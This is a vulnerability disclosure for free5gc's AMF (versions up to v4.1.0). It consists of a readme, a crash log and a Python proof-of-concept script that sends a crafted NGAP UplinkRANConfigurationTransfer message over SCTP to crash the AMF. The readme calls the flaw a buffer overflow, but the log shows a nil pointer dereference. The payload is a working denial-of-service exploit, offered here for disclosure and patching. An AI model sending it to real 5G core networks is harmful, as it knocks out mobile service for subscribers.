free5gc <= v4.1.0 Buffer Overflow Vulnerability in AMF UplinkRANConfigurationTransfer Handling

readme.md

CVE Information

Vendor: free5gc (https://free5gc.org)
Affected Product: free5gc AMF (Access and Mobility Management Function)
Affected Version: <= v4.1.0
Vulnerability Type: Buffer Overflow
Impact: Denial of Service (DoS)
Attack Vector: Remote (requires gNB connection)

Description

A buffer overflow vulnerability exists in the AMF component of free5gc when processing a crafted UplinkRANConfigurationTransfer NGAP message. An attacker-controlled gNB can send a message with missing/malformed TargetRANNodeID fields or non-existent RAN context references, causing a nil pointer dereference and AMF process crash.

Proof of Concept (PoC)

The PoC script connects to the AMF over SCTP and sends a malicious NGAP message to trigger the crash. See poc.py for details.

Log Sample

The crash log (see log) shows a panic due to invalid memory address dereference in handleUplinkRANConfigurationTransferMain.

Mitigation

Upgrade to free5gc > v4.1.0. Developers have acknowledged the issue (see reference).

Reference

• free5gc Issue #725

log

2025-10-02T14:59:32.787009968+08:00 [FATA][AMF][Ngap] panic: runtime error: invalid memory address or nil pointer dereference
goroutine 12260206 [running]:
runtime/debug.Stack()
	/usr/local/go/src/runtime/debug/stack.go:26 +0x5e
github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/service/service.go:186 +0x45
panic({0xf2d3c0?, 0x19eb0a0?})
	/usr/local/go/src/runtime/panic.go:787 +0x132
github.com/free5gc/amf/internal/ngap.handleUplinkRANConfigurationTransferMain(0xc0002d5ef0, 0xc000a64400)
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/handler.go:1842 +0xbb
github.com/free5gc/amf/internal/ngap.handlerUplinkRANConfigurationTransfer(0xc0002d5ef0, 0xc001c01c00)
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/handler_generated.go:11897 +0xa2c
github.com/free5gc/amf/internal/ngap.dispatchMain(0xc0002d5ef0, 0x59?)
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/dispatcher_generated.go:116 +0x2e7
github.com/free5gc/amf/internal/ngap.Dispatch({0x12ad1b0, 0xc0014469e0}, {0xc006cbc000, 0x59, 0x40000})
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/dispatcher.go:49 +0x1d5
github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0014469e0, 0x40000, {0x115bad8?, 0x115bae8?, 0x115bae0?})
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/service/service.go:239 +0x3d5
created by github.com/free5gc/amf/internal/ngap/service.listenAndServe in goroutine 27
	/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/service/service.go:160 +0x88a

poc.py

import sctp
import socket
from socket import htonl

RAN_N2_IPV4_ADDR = "127.0.0.5"
AMF_N2_IPV4_ADDR = "127.0.0.5"

def connect_sctp(local_addr, remote_addr, local_port, remote_port):
    sock = sctp.sctpsocket_tcp(socket.AF_INET)
    sock.bind((local_addr, local_port))
    sock.connect((remote_addr, remote_port))
    return sock

def test_bug():
    # RAN connect to AMF
    try:
        conn = connect_sctp(RAN_N2_IPV4_ADDR, AMF_N2_IPV4_ADDR, 9486, 38412)
    except Exception as e:
        print(f"Failed to connect to AMF N2: {e}")
        exit()
    
    send_msg = b'\x000\x00T\x00\x00\x01\x00c\x00M$\x80\x00\x00\x00\x7f\xff\x80\x00\x00\xff\xff\x80\x01\xff\x00\x124V\xff\xff\xff\x00\xff\xff\xff@\xff\xff\xff\xbc\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x01\x00R\x00\x00\x01\x02|\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x01\x00\x01\x01'
    conn.sctp_send(send_msg, ppid=htonl(60)) 
    
    try:
        recvMsg = conn.recv(2048)
        if recvMsg:
            print(recvMsg)
    except socket.timeout as e:
        print(f"No response: {e}")
    
    conn.close()

if __name__ == "__main__":
    test_bug()